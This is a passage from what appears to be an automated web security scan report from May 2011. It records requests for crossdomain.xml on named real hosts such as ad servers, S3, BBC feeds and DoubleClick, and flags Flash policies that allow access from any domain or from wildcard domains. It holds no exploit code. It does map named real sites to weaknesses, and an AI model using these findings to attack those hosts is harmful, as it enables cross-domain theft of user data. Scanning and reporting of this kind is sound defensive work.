Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.16. http://l.betrad.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://l.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.betrad.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Type: text/xml
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 212

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-do
...[SNIP]...

5.17. http://log30.doubleverify.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://log30.doubleverify.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: log30.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT
Accept-Ranges: bytes
ETag: "034d21c5697ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 18:36:54 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.18. http://m.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 16-May-2011 20:03:23 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.19. http://pixel.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 16 May 2011 18:35:34 GMT
Content-Type: text/xml
Content-Length: 207
Date: Sun, 15 May 2011 18:35:34 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

5.20. http://r1-ads.ace.advertising.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r1-ads.ace.advertising.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:35:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:35:43 GMT
Content-Type: text/xml
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.21. http://r1.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r1.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r1.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 19 May 2008 09:05:58 GMT
ETag: "289991e-f7-44d91abfe2980"
Accept-Ranges: bytes
Content-Length: 247
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Date: Sun, 15 May 2011 18:54:12 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.22. http://s3.amazonaws.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s3.amazonaws.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s3.amazonaws.com

Response

HTTP/1.1 200 OK
x-amz-id-2: uZR67R7fWCnMHlQmDayyE6cVENLbAMM6UVYWpXksZv7/sVaiFn/In/+KtywKWm/4
x-amz-request-id: E4E287A69016D106
Date: Sun, 15 May 2011 20:01:14 GMT
Content-Type: text/xml
Connection: close
Server: AmazonS3

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" secure="false" /></cross-domain-pol
...[SNIP]...

5.23. http://segment-pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sun, 15 May 2011 18:35:45 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

5.24. http://speed.pointroll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:51d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 18:35:48 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

5.25. http://t.mookie1.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:38:36 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 12 Apr 2011 21:52:25 GMT
ETag: "630000a-c9-4a0bfb522d840"
Accept-Ranges: bytes
Content-Length: 201
Keep-Alive: timeout=15, max=20
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.26. http://tcr.tynt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tcr.tynt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tcr.tynt.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1800
Content-Type: text/xml
Date: Sun, 15 May 2011 20:00:49 GMT
ETag: "251523935"
Expires: Sun, 15 May 2011 20:30:50 GMT
Last-Modified: Tue, 10 Nov 2009 16:25:33 GMT
Server: EOS (lax001/283C)
X-Cache: HIT
Content-Length: 201
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.27. http://vtr.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vtr.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: vtr.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:23:49 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 02 Mar 2010 19:20:25 GMT
ETag: "510259-1f5-41f87040"
Accept-Ranges: bytes
Content-Length: 501
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all
...[SNIP]...
<allow-access-from domain="*" to-ports="*" secure="false" />
...[SNIP]...

5.28. http://webmail.vtr.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://webmail.vtr.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: webmail.vtr.net

Response

HTTP/1.1 200 OK
Content-Length: 97
Connection: close
Date: Sun, 15 May 2011 18:25:06 GMT
Content-Type: application/octet-stream
Server: CommuniGatePro/5.1.16

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />
</cross-domain-policy>

5.29. http://www.kol.co.nz/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kol.co.nz
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kol.co.nz

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:25:16 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g
Last-Modified: Thu, 27 May 2010 21:49:36 GMT
ETag: "40004a-16f-5dd81c00"
Accept-Ranges: bytes
Content-Length: 367
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="http://fre8393s2.wagner.2day.com" />
   <allow-access-from domain="fre8393s2.wagner.2day.com" />
   <allow-access-from domain="202.41.139.6" />
   <allow-access-from domain="*" />
...[SNIP]...

5.30. http://www.kosmix.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kosmix.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:00:43 GMT
Server: Apache/2.2.15 (Fedora)
Last-Modified: Thu, 14 Apr 2011 21:20:09 GMT
Accept-Ranges: bytes
Content-Length: 101
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:00:43 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b345525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:02:43 GMT;path=/

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.31. http://www.righthealth.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.righthealth.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:01:12 GMT
Server: Apache/2.2.15 (Fedora)
Last-Modified: Wed, 15 Sep 2010 16:51:18 GMT
Accept-Ranges: bytes
Content-Length: 101
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:01:12 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=47
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:16:12 GMT;path=/

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.32. http://api.tweetmeme.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.tweetmeme.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 15 May 2011 18:26:54 GMT
Content-Type: text/xml; charset='utf-8'
Connection: close
P3P: CP="CAO PSA"
Expires: Sun, 15 May 2011 18:29:43 +0000 GMT
Etag: 9d3c7d0b9691696b415ce58b2738ea37
X-Served-By: h03

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.break.com" secure="true"/><allow-access-from domain="*.nextpt.com" secure="true"/>
...[SNIP]...

5.33. http://cookex.amp.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cookex.amp.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cookex.amp.yahoo.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:35:55 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 14 May 2010 21:53:13 GMT
Accept-Ranges: bytes
Content-Length: 1548
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
...[SNIP]...
<allow-access-from domain="*.sueddeutsche.de" />
<allow-access-from domain="*.ooyala.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.auditude.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.mavenapps.net" />
<allow-access-from domain="*.maventechnologies.com" />
<allow-access-from domain="*.grindtv.com" />
<allow-access-from domain="*.vipix.com" />
<allow-access-from domain="*.maven.net" />
<allow-access-from domain="*.mlb.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.comcastonline.com" />
<allow-access-from domain="*.flickr.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.overture.com" />
<allow-access-from domain="*.rivals.com" />
<allow-access-from domain="*.scrippsnewspapers.com" />
<allow-access-from domain="*.vmixcore.com" />
<allow-access-from domain="*.vmix.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.yimg.com" />
...[SNIP]...

5.34. http://feeds.bbci.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=118
Expires: Sun, 15 May 2011 18:05:14 GMT
Date: Sun, 15 May 2011 18:03:16 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

5.35. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 15 May 2011 10:45:38 GMT
Expires: Mon, 16 May 2011 10:45:38 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 28208
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

5.36. http://newsrss.bbc.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Sun, 15 May 2011 18:05:14 GMT
Date: Sun, 15 May 2011 18:03:14 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

5.37. http://player.ooyala.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://player.ooyala.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: player.ooyala.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 16 Jul 2010 14:51:39 GMT
Content-Type: text/x-cross-domain-policy
Cache-Control: public, max-age=3600
Date: Sun, 15 May 2011 18:38:16 GMT
Content-Length: 330
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*.ooyala.com" />
...[SNIP]...

5.38. http://pubads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 15 May 2011 18:10:02 GMT
Expires: Mon, 16 May 2011 18:10:02 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 895

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
